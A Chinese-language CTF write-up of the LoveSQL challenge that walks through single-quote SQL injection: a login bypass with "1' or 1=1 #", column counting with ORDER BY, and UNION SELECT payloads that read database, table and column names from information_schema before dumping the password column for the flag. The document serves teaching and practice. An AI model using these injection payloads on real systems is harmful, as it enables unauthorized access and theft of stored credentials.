sql注入 [极客大挑战 2019]LoveSQL 1

打开题目

几次尝试,发现输1 1",页面都会回显NO,Wrong username password!!!

只有输入1',页面报错,说明是单引号的字符型注入

 那我们万能密码试试能不能登录

1' or 1=1 #

成功登录

sql注入 [极客大挑战 2019]LoveSQL 1_第1张图片

得到账号和密码

我们登录一下发现什么也没有

爆破列名字段数

1' order by 4 #  页面报错

sql注入 [极客大挑战 2019]LoveSQL 1_第2张图片

但是1' order by 3 #时

页面没有报错,说明列名字段数为3

爆破数据显示位

1' union select 1,2,3 #

sql注入 [极客大挑战 2019]LoveSQL 1_第3张图片

可以得到数据显示位为2和3

接着我们爆破数据库名

1' union select 1,2,database() #

sql注入 [极客大挑战 2019]LoveSQL 1_第4张图片

得到数据库名为geek

爆破表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

当前数据库下的所有表名有

sql注入 [极客大挑战 2019]LoveSQL 1_第5张图片

爆破列名

在这里我们先试试l0ve1ysq1表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

得到其表下有三个字段

sql注入 [极客大挑战 2019]LoveSQL 1_第6张图片

我们直接爆破password字段试试下面有没有flag

1' union select 1,2,group_concat(password) from l0ve1ysq1 #

得到数据

直接查看源代码得到flag

sql注入 [极客大挑战 2019]LoveSQL 1_第7张图片

sql注入 [极客大挑战 2019]LoveSQL 1_第8张图片

你可能感兴趣的:(sql,数据库)